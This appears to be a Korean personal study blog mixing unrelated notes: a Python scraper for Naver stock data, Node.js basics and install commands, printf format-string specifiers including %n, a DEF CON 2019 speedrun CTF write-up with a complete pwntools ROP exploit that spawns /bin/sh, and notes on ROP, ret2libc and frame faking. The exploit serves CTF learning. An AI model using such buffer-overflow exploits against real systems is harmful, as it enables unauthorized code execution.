Gamja's Farm

뭐 빅데이터 책으로 공부하다가 데이터도 긁어올겸 python으로 현재 네이버 주식 시가총액창에 있는 데이터를 긁어오는 코드를 짜봤다.

이 데이터가 필요한지는 잘 모르겠지만 간만에 python으로 소스를 짜보았다.

#-*- coding:utf-8 -*-
import requests
import pandas as pd
from bs4 import BeautifulSoup
import datetime

def make_data(tag):
    for i in range(0,len(tag)):
        ttag = tag[i].find_all('td')
        title.append(ttag[1].text)
        now.append(ttag[2].text)
        try:
            updown = (ttag[3].find('img')['alt'])
            if updown == "상승":
                updown = "+"
            else:
                updown = "-"
        except :
            updown = "변동없음"
        yest_rate.append(str(updown)+ttag[3].text.strip())
        fluct_rate.append(ttag[4].text.strip())
        face_value.append(ttag[5].text)
        foreign.append(ttag[8].text)
        volume.append(ttag[9].text)
        per.append(ttag[10].text)
        roe.append(ttag[11].text)    

def get_tag(i):
    req = requests.get("https://finance.naver.com/sise/sise_market_sum.nhn?sosok=0&page={}".format(i))
    html = req.text
    bs = BeautifulSoup(html,'html.parser')
    tag = bs.find('tbody').find_all('tr', {'onmouseover':'mouseOver(this)'})
    return tag

time_now = []
now_time = datetime.datetime.now()
time_ = now_time.strftime('%Y-%m-%d %H:%M:%S')
time_now.append(time_)
title = [] #종목
now = [] #현재가
yest_rate = [] #전일비
fluct_rate = [] #등락률
face_value = [] #액면가
volume = [] #거래량
foreign = [] #외국인비율
per = [] #PER
roe = [] #ROE


for i in range(1,33):
    tag = get_tag(i)
    make_data(tag)

df = pd.DataFrame(title)
df1 = pd.DataFrame(now)
df2 = pd.DataFrame(yest_rate)
df3 = pd.DataFrame(fluct_rate)
df4 = pd.DataFrame(face_value)
df5 = pd.DataFrame(volume)
df6 = pd.DataFrame(foreign)
df7 = pd.DataFrame(per)
df8 = pd.DataFrame(roe)
df9 = pd.DataFrame(time_now)

res = pd.concat([df,df1,df2,df3,df4,df5,df6,df7,df8,df9],axis=1)
res.columns = ['종목','현재가','전일비','등락률','액면가','거래량','외국인비율','PER','ROE','시간']
res.to_excel('{}.xlsx'.format(time_))

일단 이거 돌리면 현재 네이버에 떠있는 주식 종목, 현재가, 전일비, 등락률, 액면가, 거래량, 외국인비율, per, roe 정보를 가져오고 시간도 기록해준다.

이 정보들을 긁어와주는데 사람들이 무슨 하나하나 긁는거 같아서 만들어 보았다.
필요한 모듈은 requests, pandas, bs4, datetime인것 같다.

결과는 아래와 같이 나온다. 

찾아보니 매일 주식 정보를 기록하시는 분들이 사용하시면 좋을 것 같다.

console 객체

• log() : 출력
• time() : 시간 측정시작
• timeEnd() : 시간 측정종료

printf처럼 console.log()를 사용
%d(숫자), %s(문자열), %j(Json) 이 사용가능하며 이때 파라미터의 갯수가 변환 문자보다 많으면 전체 완성 문자열 뒤에 붙고 파라미터의 갯수가 적으면 변환 문자 포멧이 그래도 출력된다.

>console.log('Hi'); => Hi
>console.log('%d %d', 12); => 12 %d
>console.log('%d', 12, 12); => 12 12;

process 객체

• argv : 실행 매개변수

• env : 컴퓨터 환경과 관련된 정보

• version : Node.js 버전

• versions : Node.js 종속 프로그램 버전

• arch : 프로세서의 아키텍차

• platform : 플랫폼

• exit() : 프로그램 종료

• memory() : 메모리 사용정보 객체 리턴

• uptime() : 프로그램이 실행된 시간 리턴

exports

모듈을 만들어 사용할 때에 메서드를 정의할 때에 exports.메소드명 = function(){}; 으로 정의를 한다.
그러면 이때 이 모듈을 사용하는 소스코드는 var module = require('불러올 모듈_path');로 가져와 사용한다.

Node.js 우분투 설치

sudo apt-get install build-essential
sudo password for User:비밀번호 입력

curl -sL https://deb.nodesource.com/setup_4.x | sudo -E bash -
(curl 설치 안되어있으면 sudo apt-get install curl)
sudo apt-get install -y nodejs

이후 터미널창에 node 라고 치면 실행되는지 확인 후

>console.log('Hello World');

실행해서 실행이 된다면 성공

Node.js 맥설치

Node.js 홈페이지에서 Mac Installer 다운로드후 실행
이후 확인과정은 우분투와 동일합니다.

출처 - https://github.com/alexander-hanel/idapython6to7

%100$8lx => 100 : 스택에서 부터 100번째 자리에 있는 인자; 8 : 8자리로 맞추어 출력; lx : 16byte 형태로 4byte 출력

%hn => h=> 2byte 단위;

%d => 정수형 10진수 상수

%f => 실수형 상수(float)

%lf => 실수형 상수(double)

%c => 문자값

%s => 문자열

%u => 양의 정수(10진수)

%o => 양의 정수(8진수)

%x => 양의 정수(16진수)

%lx => 양의 정수 16진수형태로 4byte 출력

%n => int(쓰인 총 바이트 수)

%hn => %n의 반인 2 바이트 단위

%x 와 %p 와 %#x 의 차이

%x 는 나온 값을 16진수로 표현하지만 나온 숫자만을 표시한다면 ( 스택에 들어 있는 값 )

%p는 나온 값을 4byte형태로 나타내가 때문에 빈 곳은 0으로 채워 딱 맞추어 나타내고

%#x를 붙인다면 앞에 출력시 0x를 붙여서 출력시켜 준다.

2019년 데프콘 CTF 스피드런 문제를 리뷰 해보도록 하겠습니다. 우선 우리는 문제를 실행시켜 보겠습니다.

이렇게 실행되어지는 문제이고 이것을 분석하기 위하여 IDA를 사용하여 열어보면 굉장히 큰 바이너리로 이루어 진 것을 알 수 있습니다.

하지만 우리는 실행시켰을 때 알아낸 문자열을 통하여 실행 부분을 찾을수 있습니다.

이렇게 찾게되고 그것의 main함수 까지 알아 냅니다.

이때 우리는 buf의 크기보다 더 많은 양을 넣을 수 있는 read 함수를 찾을 수 있습니다. 따라서 우리는 overflow가 된다는 것을 알 수 있습니다. 우선 우리는 보호기법을 체크해줍니다.

그러면 PIE가 걸려있지 않기 때문에 IDA에서 본 주소와 동일하게 사용가능한 것을 알 수 있습니다.

그렇기에 우리는 read 양만큼의 A 문자를 넣어보면 무리 없이 들어간 다는 것을 알 수 있습니다. 따라서 우리는 SROP를 통한 익스 플로잇 코드를 작성해야 한다는 것을 알 수 있습니다.

그렇기에 우리는 rop 명령어를 통한 가젯들을 수집합니다. (pop rdi, pop rsi, pop rdx, pop rax, syscall) 그리고 우리는 처음 /bin/sh 문자열을 넣을 위치를 정하여야 합니다.

따라서 elfheader 명령어를 통한 bss 영역의 주소를 알아낼 수 있습니다. 그 후 우리는 bss영역에 read함수를 이용하여 /bin/sh 문자열을 대입하고 execve 함수를 통하여 /bin/sh 를 실행하는 코드를 작성합니다.

from pwn import *

p = remote("speedrun-001.quals2019.oooverflow.io", 31337)

def dd(payload):
	p.recvuntil('Any last words?')
	p.sendline(payload)

syscall = 0x474e65
pop_rax = 0x415664
pop_rdi = 0x400686
pop_rsi = 0x4101f3
pop_rdx = 0x4498b5
main_addr = 0x400BC1

bss = 0x006bc000-0x100


payload = 'A'*0x400
payload += p64(bss - 0x100)
payload += p64(pop_rdi) + p64(0)
payload += p64(pop_rsi) + p64(bss)
payload += p64(pop_rdx) + p64(8)
payload += p64(pop_rax) + p64(0)
payload += p64(syscall)
payload += p64(main_addr)

dd(payload)

p.send('/bin/sh\x00')


payload = 'A' * 0x400
payload += p64(0xdeadbeef)
payload += p64(pop_rdi) + p64(bss)
payload += p64(pop_rsi)+ p64(0)
payload += p64(pop_rdx) + p64(0)
payload += p64(pop_rax) + p64(59)
payload += p64(syscall)
payload += p64(main_addr)

dd(payload)
p.recvuntil("A"*0x400)
p.sendline("/bin/sh;")
p.sendline("cat flag")

p.interactive()

작성한 코드를 실행시킨다면 우리는 flag를 획득할 수 있습니다.

ROP(Return Oriented Programming) - x86

ROP는 공격자가 실행 공간 보호(NX bit) 및 코드 서명(Code Signing)과 같은 보안 방어가 있는 상태에서 코드를 실행할 수 있게 해주는 기술입니다.

= RTL + Gadget

이 기법에서는 공격자는 프로그램의 흐름을 변경하기 위해 Stack Overflow 취약성이 필요하고, 가젯이라고 하는 해당 프로그램이 사용하는 메모리에 이미 있는 기계 명령어가 필요합니다.

ROP는 기본적으로 RTL 기법을 이용하며, 공격자는 RTL과 Gadgets을 이용해 공격에 필요한 코드를 프로그래밍 하는 것입니다.

PLT(Procedure Linkage Table) & GOT(Global Offset Table)

PLT에는 동적 링커가 공유 라이브러리의 함수를 호출하기 위한 코드가 저장되어 있습니다.

GOT(전역 오프셋 테이블)에는 동적 링커에 의해 공유 라이브러리에서 호출할 함수의 주소가 저장됩니다.

=>.got.plt 섹션에 저장

PLT와 GOT를 사용하는 이유

: Dynamic Link 방식으로 컴파일 하면 라이브러리가 프로그램 외부에 있기 때문에 함수의 주소를 알아오는 과정이 필요한 것입니다.

elfsymbol 찾고자하는 function_name => plt와 got 주소

쓸수 있는 공간 찾기 위한 방법

shell objdump -h ~/study/x86_rop/rop

ROP - x64

-------------------------------------------

     Gadget(POP RDI, RET) Addr

-------------------------------------------

          First argument value

-------------------------------------------

 Gadget(POP RSI, POP RDX,ret) Addr

-------------------------------------------

         Second argument value

-------------------------------------------

           Third argument value

-------------------------------------------

       read function address of libc

-------------------------------------------

        Gadget(POP RDI, RET) Addr

-------------------------------------------

            First argument value

-------------------------------------------

      System fucntion address of libc

-------------------------------------------

1. setresuid(0,0,0) => 권한을 root(0)으로 변경

2. system 함수를 이용해 "/bin/sh" 실행

ROPgadget --binary path | grep "string"

RTL(Return to Libc)

return address 영역에 공유 라이브러리 함수의 주소로 변경해 해당함수를 호출

x64 Calling convention

=> RDI, RSI, RDX, RCX, R8, R9 return=EAX

ROP(Return Oriented Programming)

ret2libc 기법을 사용하기 위해서는 

Return Address 영역에 pop rdi, ret 코드가 저장된 주소값을 저장해야 합니다.

Retrun Address 다음영역에 해당 레지스터에 저장 할 인자 값을 저장합니다.

그 다음 영역에 호출 할 함수의 주소를 저장합니다.

Call 함수

push EIP+4

jmp 주소

Frame faking(Fake ebp)

Frame faking이란 가짜 스택 프레임 포인터(Stack Frame Pointer)를 만들어 실행 흐름을 제어하는 것입니다.

Return Address영역 까지만 덮어쓸수 있을 경우 사용 가능합니다.

LEAVE & RET Instruction

Instruction x86 x64

LEAVE mov esp, ebp mov rsp, rbp

pop ebp pop rbp

RET pop eip pop eip

jmp eip jmp rip

pop 명령어는 주소 안에 있는 값을 넣어준다

overflow로 frame pointer영역에 rtl 코드가 저장되어있는 주소 -0x4 주소를 저장

return address 영역에 leave 명령어가 저장되어 있는 주소를 저장